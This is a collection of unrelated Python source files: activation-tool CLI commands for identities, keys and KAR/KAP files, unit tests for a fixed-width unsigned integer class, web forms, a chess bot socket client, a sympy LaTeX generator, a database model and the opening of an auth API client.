    Syntax = "<identity name> [<identity .ini>]"
    Help = "Create a new identity for activation."
    MaxParams = 2
    MinParams = 1
    def run(self, intr, id_name, identity_ini = None):
        """Create identity *id_name*, either from an .ini file ("@stdin" reads
        the .ini from standard input) or interactively prompting each field."""
        if acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s already exists.\n" % id_name)
            return 1
        else:
            if identity_ini:
                if identity_ini != "@stdin" and not os.path.exists(identity_ini):
                    sys.stderr.write("File %s doesn't exists." % identity_ini)
                    return 1
                cfg = ConfigParser.ConfigParser()
                if identity_ini == "@stdin":
                    cfg.readfp(sys.stdin)
                else:
                    cfg.readfp(open(identity_ini, "r"))
                # Check if we have everything we need.
                for s in ["country", "state", "location", "org",
                          "org_unit", "domain", "name", "email"]:
                    if not cfg.has_option("identity", s):
                        sys.stdout.write("Missing %s in .ini file.\n" % s)
                        return 1
                ident = acttools.Identity(intr.basedir, id_name)
                ident.country = cfg.get("identity", "country")
                ident.state = cfg.get("identity", "state")
                ident.location = cfg.get("identity", "location")
                ident.org = cfg.get("identity", "org")
                ident.org_unit = cfg.get("identity", "org_unit")
                ident.domain = cfg.get("identity", "domain")
                ident.name = cfg.get("identity", "name")
                ident.email = cfg.get("identity", "email")
                ident.admin_name = cfg.get("identity", "name")
                ident.admin_email = cfg.get("identity", "email")
                ident.save()
            else:
                # Manually enter everything.
                ident = acttools.Identity(intr.basedir, id_name)
                ident.country = intr.simple_input("Country? ".rjust(15))
                ident.state = intr.simple_input("State? ".rjust(15))
                ident.location = intr.simple_input("Location? ".rjust(15))
                ident.org = intr.simple_input("Org.? ".rjust(15))
                ident.org_unit = intr.simple_input("Org. unit? ".rjust(15))
                ident.email = intr.simple_input("Email? ".rjust(15))
                ident.domain = intr.simple_input("Domain? ".rjust(15))
                ident.admin_name = intr.simple_input("Admin. name? ".rjust(15))
                ident.admin_email = intr.simple_input("Admin. email? ".rjust(15))
                ident.save()
        return 0
class NewActivatorCommand(Command):
    """Interactive command: create a new activator, optionally wired to an
    existing identity and key set."""
    Name = "newactivator"
    Syntax = "<activator name> [<identity name>] [<keyset name>]"
    Help = "Create a new activation."
    MaxParams = 3
    MinParams = 1
    def run(self, intr, act_name, id_name = None, keys_name = None):
        """Create activator *act_name*; both identity and key set are optional."""
        if acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s already exists.\n" % act_name)
            return 1
        if id_name and not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
            return 1
        if keys_name and not acttools.KeySet.exists(intr.basedir, keys_name):
            sys.stderr.write("Key set name %s doesn't exists.\n" % keys_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        if id_name:
            ident = acttools.Identity(intr.basedir, id_name)
            act.identity = ident
        if keys_name:
            keys = acttools.KeySet(intr.basedir, keys_name)
            act.keyset = keys
        act.save()
        return 0
class ShowCSRCommand(Command):
    """Interactive command: print the CSR used to assert an identity."""
    Name = "showcsr"
    Syntax = "<identity name>"
    Help = "Display the CSR to be used to assert the identity."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, id_name):
        """Write the identity's certificate signing request to stdout."""
        if not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n")
            return 1
        else:
            ident = acttools.Identity(intr.basedir, id_name)
            sys.stdout.write(ident.get_CSR())
        return 0
class ShowCertCommand(Command):
    """Interactive command: print the certificate asserting an identity."""
    Name = "showcert"
    Syntax = "<identity name>"
    Help = "Display the certificate used to assert the identity."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, id_name):
        """Write the identity's certificate to stdout."""
        if not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
            return 1
        else:
            ident = acttools.Identity(intr.basedir, id_name)
            sys.stdout.write(ident.get_cert())
        return 0
class SetCertCommand(Command):
    """Interactive command: install the certificate asserting an identity."""
    Name = "setcert"
    Syntax = "<identity name> <file name>"
    Help = "Set the certificate that asserts the identity."
    MaxParams = 2
    MinParams = 2
    def run(self, intr, id_name, cert_file):
        """Read the certificate from *cert_file* ("@stdin" reads it from
        standard input) and attach it to identity *id_name*.

        Returns 0 on success, 1 when the file or the identity does not exist
        or when the certificate does not actually assert the identity.
        """
        if cert_file != "@stdin" and not os.path.exists(cert_file):
            sys.stderr.write("File %s doesn't exists.\n" % cert_file)
            return 1
        if cert_file == "@stdin":
            cert_data = sys.stdin.read()
        else:
            cert_data = read_file(cert_file)
        if not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
            return 1
        ident = acttools.Identity(intr.basedir, id_name)
        ident.set_cert(cert_data)
        # BUG FIX: this check used to sit *after* an unconditional
        # "return 0" and was dead code, so certificates that do not assert
        # the identity were silently accepted.
        if not ident.asserted:
            sys.stderr.write("This certificate doesn't assert this identity.\n")
            return 1
        return 0
class SetParentIdentityCommand(Command):
    """Interactive command: set (or clear) the KAR-signing parent identity."""
    Name = "setparentidentity"
    Syntax = "<activator name> <identity name>"
    Help = "Set the parent identity to be used for signing a KAR."
    MaxParams = 2
    MinParams = 1
    def run(self, intr, act_name, parent_id_name = None):
        """Attach *parent_id_name* to the activator; omit it to clear."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        if parent_id_name and not acttools.Identity.exists(intr.basedir, parent_id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % parent_id_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        if parent_id_name:
            ident = acttools.Identity(intr.basedir, parent_id_name)
            act.parent_identity = ident
        else:
            act.parent_identity = None
        act.save()
        return 0
class SetIdentityCommand(Command):
    """Interactive command: set (or clear) an activator's identity."""
    Name = "setidentity"
    Syntax = "<activator name> <identity name>"
    Help = "Set the identity to be used for the activator."
    MaxParams = 2
    MinParams = 1
    def run(self, intr, act_name, id_name = None):
        """Attach *id_name* to the activator; omit it to clear."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        if id_name and not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        if id_name:
            ident = acttools.Identity(intr.basedir, id_name)
            act.identity = ident
        else:
            act.identity = None
        act.save()
        return 0
class SetKeysCommand(Command):
    """Interactive command: set (or clear) an activator's key set."""
    Name = "setkeys"
    Syntax = "<activator name> <key set name>"
    Help = "Set the key set to be used for the activator."
    MaxParams = 2
    MinParams = 1
    def run(self, intr, act_name, keys_name = None):
        """Attach *keys_name* to the activator; omit it to clear."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        if keys_name and not acttools.KeySet.exists(intr.basedir, keys_name):
            sys.stderr.write("Key set name %s doesn't exists.\n" % keys_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        if keys_name:
            keys = acttools.KeySet(intr.basedir, keys_name)
            act.keyset = keys
        else:
            act.keyset = None
        act.save()
        return 0
class RmIdentityCommand(Command):
    """Interactive command: delete an identity from disk."""
    Name = "rmidentity"
    Syntax = "<identity name>"
    Help = "Delete an existing identity."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, id_name):
        """Delete identity *id_name*; fails when it does not exist."""
        if not acttools.Identity.exists(intr.basedir, id_name):
            sys.stderr.write("Identity %s doesn't exists.\n" % id_name)
            return 1
        else:
            acttools.Identity(intr.basedir, id_name).delete()
        return 0
class RmKeysCommand(Command):
    """Interactive command: delete a key set from disk."""
    Name = "rmkeys"
    Syntax = "<key set name>"
    Help = "Delete a set of keys."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, keys_name):
        """Delete key set *keys_name*; fails when it does not exist."""
        if not acttools.KeySet.exists(intr.basedir, keys_name):
            sys.stderr.write("Key set %s doesn't exists.\n" % keys_name)
            return 1
        else:
            acttools.KeySet(intr.basedir, keys_name).delete()
        return 0
class RmActivatorCommand(Command):
    """Interactive command: delete an activator from disk."""
    Name = "rmactivator"
    Syntax = "<activator name>"
    Help = "Remove an activator."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, act_name):
        """Delete activator *act_name*; fails when it does not exist."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        act.delete()
        return 0
class NewKeysCommand(Command):
    """Interactive command: create a new key set, optionally seeded with the
    initial (pre-activation) encryption key pair."""
    Name = "newkeys"
    Syntax = "<keys name> [<initial encryption pkey> <initial encryption skey>|@stdin]"
    Help = "Create new keys for a particular identity."
    MaxParams = 3
    MinParams = 1
    def run(self, intr, keys_name, zero_enc_pkey = None, zero_enc_skey = None):
        """Create key set *keys_name*; "@stdin" reads "<pkey>@<skey>" data
        from standard input instead of reading key files."""
        if acttools.KeySet.exists(intr.basedir, keys_name):
            sys.stdout.write("Key set %s already exists.\n" % keys_name)
            return 1
        else:
            zero_enc_pkey_data = zero_enc_skey_data = None
            if zero_enc_pkey == "@stdin":
                # This is kind of a hack to support ractivate.
                (zero_enc_pkey_data, zero_enc_skey_data) = sys.stdin.read().split("@")
                acttools.KeySet(intr.basedir, keys_name,
                                zero_pkey_data = zero_enc_pkey_data,
                                zero_skey_data = zero_enc_skey_data)
            else:
                acttools.KeySet(intr.basedir, keys_name,
                                zero_pkey_file = zero_enc_pkey,
                                zero_skey_file = zero_enc_skey)
        return 0
class GenKARCommand(Command):
    """Interactive command: generate a KAR file from an activator."""
    Name = "genkar"
    Syntax = "<activator name> <kar output file>"
    Help = "Prepare a new KAR from the activator."
    MaxParams = 2
    MinParams = 2
    def run(self, intr, act_name, output_file):
        """Write the activator's KAR to *output_file* ("@stdout" prints it)."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        # Product name/version are embedded in the KAR when available.
        product_name = "unknown"
        product_version = "unknown"
        if os.path.exists("/etc/teambox/product_name"):
            product_name = read_file("/etc/teambox/product_name")
        if os.path.exists("/etc/teambox/product_version"):
            product_version = read_file("/etc/teambox/product_version")
        act = acttools.Activator(intr.basedir, act_name)
        if output_file == "@stdout":
            sys.stdout.write(act.get_KAR(product_name, product_version))
        else:
            write_file(output_file, act.get_KAR(product_name, product_version))
        return 0
class OpenKAPCommand(Command):
    """Interactive command: register a KAP file with an activator."""
    Name = "openkap"
    Syntax = "<activator name> <kap file> [applykap]"
    Help = "Open a KAP file."
    MaxParams = 3
    MinParams = 2
    def run(self, intr, act_name, kap_file, applykap = None):
        """Add *kap_file* ("@stdin" reads it from standard input) to the
        activator; with the literal third argument "applykap", apply it too."""
        if kap_file != "@stdin" and not os.path.exists(kap_file):
            sys.stderr.write("KAP file %s doesn't exists." % kap_file)
            return 1
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        if applykap and applykap != "applykap":
            sys.stderr.write("Invalid third argument. Must be applykap.")
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        if kap_file != "@stdin":
            kap_id = act.add_KAP(read_file(kap_file))
        else:
            kap_id = act.add_KAP(sys.stdin.read())
        if applykap:
            # Delegate to the applykap command so behavior stays identical.
            r = intr.run_command(["applykap", act.name, kap_id])
            if r != 0: return r
        return 0
class LsKAPCommand(Command):
    """Interactive command: list the KAPs registered to an activator."""
    Name = "lskap"
    Syntax = "<activator name>"
    Help = "List the KAP registered to an activator."
    MaxParams = 1
    MinParams = 1
    def run(self, intr, act_name):
        """Print each KAP name with its summary lines (see dump_KAP)."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        act = acttools.Activator(intr.basedir, act_name)
        kaps = act.list_KAP()
        if len(kaps) == 0: return 0
        for k in kaps:
            (kn, kap, _) = k
            sys.stdout.write("%s\n" % kn)
            lines = dump_KAP(kap)
            for l in lines:
                sys.stdout.write("\t%s\n" % l)
        return 0
class ApplyKAPCommand(Command):
    """Interactive command: apply the actions contained in a KAP."""
    Name = "applykap"
    Syntax = "<activator name> <kap name> [test]"
    Help = "Apply actions inside the KAP."
    MaxParams = 3
    MinParams = 2
    def run(self, intr, act_name, kap_name, test = None):
        """Apply *kap_name* to the activator; the literal "test" argument
        performs a dry run instead of actually applying it."""
        if not acttools.Activator.exists(intr.basedir, act_name):
            sys.stderr.write("Activator %s doesn't exists.\n" % act_name)
            return 1
        do_apply = True
        if test == "test":
            do_apply = False
        act = acttools.Activator(intr.basedir, act_name)
        act.apply_KAP(kap_name, do_apply)
        return 0
| StarcoderdataPython |
134479 | import pytest
from uint import Uint
def test_positive_overflow():
    """Incrementing the maximum 8-bit value wraps around to zero."""
    u = Uint(0b11111111, 8)
    u += 1
    assert u.raw == 0b00000000
def test_negative_overflow():
    """Decrementing zero wraps around to the maximum 8-bit value."""
    u = Uint(0b00000000, 8)
    u -= 1
    assert u.raw == 0b11111111
def test_logical_shift():
    """Shifts are logical: bits shifted out are discarded, zeros shift in."""
    u = Uint(0b10100101, 8)
    u <<= 1
    assert u.raw == 0b01001010
    u >>= 2
    assert u.raw == 0b00010010
def test_fmt_literal():
    """literal.* renders Python-style literals (0b/0o/0x prefixes, padded)."""
    u = Uint(0xDEADBEEF, 32)
    assert u.literal.bin == f'{0xDEADBEEF:#34b}'
    assert u.literal.oct == f'{0xDEADBEEF:#13o}'
    assert u.literal.dec == f'{0xDEADBEEF}'
    assert u.literal.hex == f'{0xDEADBEEF:#10x}'
def test_fmt_wire():
    """wire.* renders Verilog-style sized literals (e.g. 32'hdeadbeef)."""
    u = Uint(0xDEADBEEF, 32)
    assert u.wire.bin == f"32'b{0xDEADBEEF:032b}"
    assert u.wire.oct == f"32'o{0xDEADBEEF:011o}"
    assert u.wire.dec == f"32'd{0xDEADBEEF}"
    assert u.wire.hex == f"32'h{0xDEADBEEF:08x}"
def test_public_api():
    """
    Exposed functions are:
    - raw -> int, returns unsigned number
    - native -> int, same as `raw`
    - literal.bin -> str, Python literal representation (binary)
    - literal.oct -> str, Python literal representation (octal)
    - literal.dec -> str, Python literal representation (decimal)
    - literal.hex -> str, Python literal representation (hexadecimal)
    - wire.bin -> str, Verilog wire representation (binary)
    - wire.oct -> str, Verilog wire representation (octal)
    - wire.dec -> str, Verilog wire representation (decimal)
    - wire.hex -> str, Verilog wire representation (hexadecimal)
    """
    u = Uint(0x5a, 8)
    assert u.raw == 0x5a
    assert u.native == 0x5a
    assert u.literal.bin == "0b01011010"
    assert u.literal.oct == "0o132"
    assert u.literal.dec == "90"
    assert u.literal.hex == "0x5a"
    assert u.wire.bin == "8'b01011010"
    assert u.wire.oct == "8'o132"
    assert u.wire.dec == "8'd90"
    assert u.wire.hex == "8'h5a"
def test_assign():
    """assign() masks to the width; -1 becomes the all-ones value."""
    u = Uint(0, 8)
    u.assign(0xff)
    assert u.raw == 0xff
    u.assign(-1)
    assert u.raw == 0xff
def test_minus():
    """Unary minus is two's-complement negation within the width."""
    u = Uint(0x01, 8)
    u = -u
    assert u.raw == 0xff
def test_lt():
    """< compares unsigned values; -1 wraps to 255 and is the largest."""
    x, y = Uint(0x01, 8), Uint(0x02, 8)
    m = Uint(-1, 8)
    assert x < y
    assert not y < x
    assert not x < x
    assert x < m
def test_le():
    """<= compares unsigned values, reflexively."""
    x, y = Uint(0x01, 8), Uint(0x02, 8)
    m = Uint(-1, 8)
    assert x <= y
    assert not y <= x
    assert x <= x
    assert x <= m
def test_eq():
    """== compares wrapped values: Uint(-1, 8) equals Uint(255, 8)."""
    x, y = Uint(1, 8), Uint(2, 8)
    m, n = Uint(-1, 8), Uint(255, 8)
    assert x == x
    assert not x == y
    assert m == n
def test_ne():
    """!= is the negation of ==, including for wrapped values."""
    x, y = Uint(1, 8), Uint(2, 8)
    m, n = Uint(-1, 8), Uint(255, 8)
    assert not x != x
    assert x != y
    assert not m != n
def test_ge():
    """>= compares unsigned values, reflexively."""
    x, y = Uint(0x01, 8), Uint(0x02, 8)
    m = Uint(-1, 8)
    assert not x >= y
    assert y >= x
    assert x >= x
    assert not x >= m
def test_gt():
    """> compares unsigned values, strictly."""
    x, y = Uint(0x01, 8), Uint(0x02, 8)
    m = Uint(-1, 8)
    assert not x > y
    assert y > x
    assert not x > x
    assert not x > m
def test_bool():
    """Truthiness follows the stored value: only zero is falsy."""
    x, y = Uint(0x00, 8), Uint(0x01, 8)
    assert not bool(x)
    assert bool(y)
def test_abs():
    """abs() returns the unsigned value; -1 wraps to 255 first."""
    x = Uint(0x01, 8)
    m = Uint(-1, 8)
    assert abs(x) == 1
    assert abs(m) == 255
def test_add():
    """Addition works with Uint and int operands and wraps at the width."""
    x, y = Uint(0x00, 8), Uint(0x1, 8)
    full = Uint(0xff, 8)
    assert (x + 39).raw == 39
    assert (x + y).raw == 1
    assert (full + 1).raw == 0
def test_and():
    """Bitwise AND works with Uint and int operands."""
    x, y, z = Uint(0x5a5a, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
    i = 0x0a50
    assert (x & y).raw == 0x5a00
    assert (x & z).raw == 0x005a
    assert (x & i).raw == 0x0a50
def test_floordiv():
    """Floor division works with Uint and int operands."""
    x, y = Uint(39, 8), Uint(13, 8)
    i = 3
    assert (x // y).raw == 3
    assert (x // i).raw == 13
def test_index():
    """int() conversion (__index__) yields the unsigned value."""
    x = Uint(39, 8)
    assert int(x) == 39
def test_invert():
    """Bitwise NOT flips every bit inside the declared width."""
    x = Uint(0x005a, 16)
    assert (~x).raw == 0xffa5
def test_lshift():
    """Left shift drops bits past the width; a full-width shift gives 0."""
    x = Uint(0xa005, 16)
    assert (x << 1).raw == 0x400a
    assert (x << 2).raw == 0x8014
    assert (x << 16).raw == 0
def test_mod():
    """Modulo works with Uint and int operands."""
    x, y = Uint(39, 8), Uint(10, 8)
    assert (x % y).raw == 9
    assert (x % 10).raw == 9
def test_mul():
    """Multiplication works with Uint and int operands."""
    m, k = Uint(3, 8), Uint(13, 8)
    assert (m * k).raw == 39
    assert (m * 13).raw == 39
def test_matmul():
    """Matrix multiplication is unsupported and raises TypeError."""
    x, y = Uint(0, 8), Uint(1, 8)
    with pytest.raises(TypeError):
        x @ y
def test_neg():
    """Unary minus produces the two's-complement within the width."""
    x = Uint(0x5a, 8)
    assert (-x).raw == 0xa6
def test_or():
    """Bitwise OR works with Uint and int operands."""
    x, y, z = Uint(0x0000, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
    i = 0x0a50
    assert (x | y).raw == 0x5a00
    assert (x | z).raw == 0x005a
    assert (y | i).raw == 0x5a50
def test_pos():
    """Unary plus is the identity."""
    x = Uint(0xff, 8)
    assert (+x).raw == 0xff
def test_pow():
    """Exponentiation wraps at the width (5**5 = 3125 & 0xff = 53)."""
    x, y = Uint(0x05, 8), Uint(0x05, 8)
    assert (x ** y).raw == 53
def test_rshift():
    """Right shift is logical; a full-width shift gives 0."""
    x = Uint(0xa005, 16)
    assert (x >> 1).raw == 0x5002
    assert (x >> 2).raw == 0x2801
    assert (x >> 16).raw == 0
def test_sub():
    """Subtraction works with Uint and int operands."""
    x, y = Uint(0xff, 8), Uint(0x0f, 8)
    i = 15
    assert (x - y).raw == 0xf0
    assert (x - i).raw == 0xf0
def test_truediv():
    """True division is unsupported and raises TypeError."""
    x, y = Uint(0, 8), Uint(1, 8)
    with pytest.raises(TypeError):
        x / y
def test_xor():
    """Bitwise XOR works with Uint and int operands."""
    x, y, z = Uint(0x0000, 16), Uint(0x5a00, 16), Uint(0x005a, 16)
    i = 0x0a50
    assert (x ^ y).raw == 0x5a00
    assert (x ^ z).raw == 0x005a
    assert (y ^ i).raw == 0x5050
def test_misc_magics():
    """str() and format() delegate to the stored value and width."""
    u = Uint(0xff, 8)
    assert str(u) == '<uint8, value=255>'
    assert f'{u:08b}' == '11111111'
183637 | """
byceps.blueprints.admin.webhook.forms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:Copyright: 2006-2021 <NAME>
:License: Revised BSD (see `LICENSE` file for details)
"""
from __future__ import annotations
from flask_babel import lazy_gettext
from wtforms import BooleanField, SelectMultipleField, StringField
from wtforms.validators import InputRequired, Optional
from wtforms.widgets import CheckboxInput, ListWidget
from ....announce.events import EVENT_TYPES_TO_NAMES
from ....util.l10n import LocalizedForm
class MultiCheckboxField(SelectMultipleField):
    # Render the multi-select as an unlabeled list of checkboxes instead of
    # the default <select multiple> element.
    widget = ListWidget(prefix_label=False)
    option_widget = CheckboxInput()
def _get_event_type_choices() -> list[tuple[str, str]]:
    """Build sorted (value, label) pairs for every known event type name."""
    names = sorted(EVENT_TYPES_TO_NAMES.values())
    return [(name, name) for name in names]
class _BaseForm(LocalizedForm):
    # Fields shared by both the create and the update webhook forms.
    description = StringField(lazy_gettext('Description'), [InputRequired()])
    format = StringField(lazy_gettext('Format'), [InputRequired()])
    url = StringField(lazy_gettext('URL'), [InputRequired()])
    # At least one event type must be selected for the webhook to fire.
    event_types = MultiCheckboxField(
        lazy_gettext('Event types'),
        choices=_get_event_type_choices(),
        validators=[InputRequired()],
    )
class CreateForm(_BaseForm):
    # Creating a webhook needs no fields beyond the shared base form.
    pass
class UpdateForm(_BaseForm):
    # Optional presentation/config tweaks that only apply to existing webhooks.
    text_prefix = StringField(lazy_gettext('Text prefix'), [Optional()])
    extra_fields = StringField(lazy_gettext('Additional fields'), [Optional()])
    enabled = BooleanField(lazy_gettext('Enabled'))
| StarcoderdataPython |
138575 | <gh_stars>1-10
# =============================================================================
# Federal University of Rio Grande do Sul (UFRGS)
# Connectionist Artificial Intelligence Laboratory (LIAC)
# <NAME> - <EMAIL>
# =============================================================================
# Copyright (c) 2011 <NAME>, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# =============================================================================
'''This is the base client for LIAC CHESS.
Use `LiacBot` as your base class to create a new bot.
'''
import sys
import json
import time
import socket
import random
class LiacBot(object):
    '''LiacBot implements a basic client for LIAC CHESS.

    LiacBot encapsulates the basic features to communicate with the LIAC CHESS
    server, such as serialization and deserialization of json messages,
    connection handshaking, etc. Use this class as a base implementation for
    your bots: override ``on_move`` and ``on_game_over``.
    '''
    name = ''
    ip = '127.0.0.1'
    port = 50100

    def __init__(self):
        '''Constructor.'''
        self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Subclasses may set a class-level ``name``; otherwise pick one.
        if not self.name:
            self.name = random.choice([
                'Liacnator', '<NAME>', 'Liaczors', 'Liaco'
            ])

    # INTERNAL METHODS ========================================================
    def _connect(self):
        '''(INTERNAL) Connects to the server.'''
        self._socket.connect((self.ip, self.port))

    def _send_data(self, data):
        '''(INTERNAL) Serialize a ``data`` object and sends it to the server.

        :param data: a Python object.
        '''
        d = json.dumps(data)
        # Bug fix: ``sendall`` requires bytes on Python 3; ``json.dumps``
        # returns ``str``, so the payload must be encoded.
        self._socket.sendall(d.encode('utf-8'))

    def _receive_data(self):
        '''(INTERNAL) Receives a message from server and deserialize it.

        :return: a Python object.
        '''
        # NOTE(review): a single 4 KiB recv assumes every server message fits
        # in one datagram-sized read — confirm against the server protocol.
        data = self._socket.recv(2**12)
        return json.loads(data)

    def _send_name(self):
        '''(INTERNAL) Sends the bot's name to the server as part of the
        handshaking procedure.
        '''
        self._send_data({
            'name': self.name
        })

    def _receive_state(self):
        '''(INTERNAL) Handle a state message, dispatching to the callbacks.'''
        state = self._receive_data()
        if state['winner'] != 0 or state['draw']:
            self.on_game_over(state)
        else:
            self.on_move(state)
    # =========================================================================

    # INTERFACE ===============================================================
    def send_move(self, from_, to_):
        '''Sends a movement to the server.

        :param from_: a 2-tuple with the piece-to-move position.
        :param to_: a 2-tuple with the target position.
        '''
        self._send_data({
            'from': from_,
            'to': to_
        })

    def on_move(self, state):
        '''Receives the state from server, when the server asks for a movement.

        Consult the documentation see which information comes within the
        `state` object.

        :param state: a state object.
        '''
        pass

    def on_game_over(self, state):
        '''Receives the state from server, when the server acknowledges a
        winner for the game.

        Consult the documentation see which information comes within the
        `state` object.

        :param state: a state object.
        '''
        pass

    def start(self):
        '''Starts the bot: connect, handshake, then process states forever.'''
        self._connect()
        self._send_name()
        while True:
            self._receive_state()
    # =========================================================================
if __name__ == '__main__':
    # Running the module directly starts a bare LiacBot: it connects to the
    # local server, sends its name and then consumes state messages forever.
    bot = LiacBot()
    bot.start()
127789 | <gh_stars>1-10
#!/usr/bin/python3
from sympy import *

init_printing()

# Entries of the symmetric 4x4 unknown matrix Q (upper triangle only).
q00, q01, q02, q03 = symbols('q_00 q_01 q_02 q_03')
q11, q12, q13 = symbols('q_11 q_12 q_13')
q22, q23 = symbols('q_22 q_23')
q33 = symbols('q_33')
allQ = [q00, q01, q02, q03, q11, q12, q13, q22, q23, q33]

# Symbolic homogeneous 4-vectors P_x, P_y, P_z.
Pix0, Pix1, Pix2, Pix3 = symbols('zR_x0, zR_x1, zR_x2, zR_x3')
Piy0, Piy1, Piy2, Piy3 = symbols('zR_y0, zR_y1, zR_y2, zR_y3')
Piz0, Piz1, Piz2, Piz3 = symbols('zR_z0, zR_z1, zR_z2, zR_z3')
Pix = Matrix([[Pix0], [Pix1], [Pix2], [Pix3]])
Piy = Matrix([[Piy0], [Piy1], [Piy2], [Piy3]])
Piz = Matrix([[Piz0], [Piz1], [Piz2], [Piz3]])

Q = Matrix([[q00, q01, q02, q03], [q01, q11, q12, q13], [q02, q12, q22, q23], [q03, q13, q23, q33]])

# The five bilinear constraints on Q, collected by the unknowns so that the
# coefficient of each q_ij can be extracted per equation.
eq1 = (Pix.T * Q * Pix - Piy.T * Q * Piy)[0]
eq2 = (Pix.T * Q * Piy)[0]
eq3 = (Piy.T * Q * Piz)[0]
eq4 = (Piz.T * Q * Pix)[0]
eq5 = (Piz.T * Q * Piz)[0]
equations = [rcollect(expand(eq), *allQ) for eq in (eq1, eq2, eq3, eq4, eq5)]

def extract_coefficients(expr):
    """Return the coefficient of each unknown in ``allQ``, in order."""
    def index(args):
        # Position of the (single) q-symbol among a term's factors.
        for i in range(len(args)):
            if args[i] in allQ:
                return i
        return 0
    # NOTE(review): assumes every term of ``expr`` contains exactly one
    # q-symbol as a direct factor — holds for the bilinear forms above.
    D = { x.args[index(x.args)] : Mul(*(x.args[:index(x.args)] + x.args[index(x.args) + 1:])) for x in expr.args }
    return [D[q] for q in allQ]

def make_row(expr):
    """Render one LaTeX matrix row of coefficients, renaming zR -> P."""
    return ' & '.join([latex(coeff).replace('zR', 'P') for coeff in extract_coefficients(expr)])

# Bug fix: the file handle was previously opened and never closed; ``with``
# guarantees the buffered LaTeX actually reaches disk.
with open("system.tex", "w+") as system:
    system.write("\\center \\begin{rotate}{270}")
    system.write("\\smatheq {\n\t\\matrix {\n")
    for eq in equations:
        system.write("\t" + make_row(eq) + "\\\\\n")
    system.write("\t} \\cdot \n")  # was "\cdot": an invalid escape sequence
    system.write("\t\\matrix {\n")
    for q in allQ:
        system.write(latex(q) + "\\\\")
    system.write("\t}\n}\n\\end{rotate}")

# Sanity check: a generic 4x3 factorisation A*A^T yields a symmetric rank-3 Q.
a, b, c, d, e, f, g, h, i, j, k, l = symbols('a b c d e f g h i j k l')
A = Matrix([
    [a, b, c],
    [d, e, f],
    [g, h, i],
    [j, k, l]])
Q = A * A.T
print(Q)
print(Q[0,:])
print(Q[1,:])
print(Q[2,:])
print(Q[3,:])
111560 | from src.db import db
from src.models.base import BaseModel, BaseSchema
class Node(BaseModel):
    # Owning dataset; deleting a Dataset cascades to its nodes via the backref.
    dataset_id = db.Column(db.Integer, db.ForeignKey('dataset.id'), nullable=False)
    dataset = db.relationship('Dataset', backref=db.backref('nodes', cascade="all, delete-orphan"))
    # Human-readable node name (optional, no length limit declared).
    name = db.Column(db.String)
class NodeSchema(BaseSchema):
    # Serialization schema auto-derived from the Node model.
    class Meta(BaseSchema.Meta):
        model = Node
142568 | <reponame>praekeltfoundation/seed-services-client
from demands import JSONServiceClient, HTTPServiceClient
class AuthApiClient(object):
    """
    Client for Auth Service.

    Logs in with the given credentials on construction and sends the
    resulting token on every subsequent request.

    :param str email:
        An email address.
    :param str password:
        The account password.
    :param str api_url:
        The full URL of the API.
    """
    def __init__(self, email, password, api_url, session=None,
                 session_http=None):
        if session is None:
            session = JSONServiceClient(url=api_url)
        # Exchange the credentials for an auth token, then rebuild the JSON
        # session so the token header is sent on every call.
        data = {"email": email, "password": password}
        login = session.post('/user/tokens/', data=data)
        self.token = login["token"]
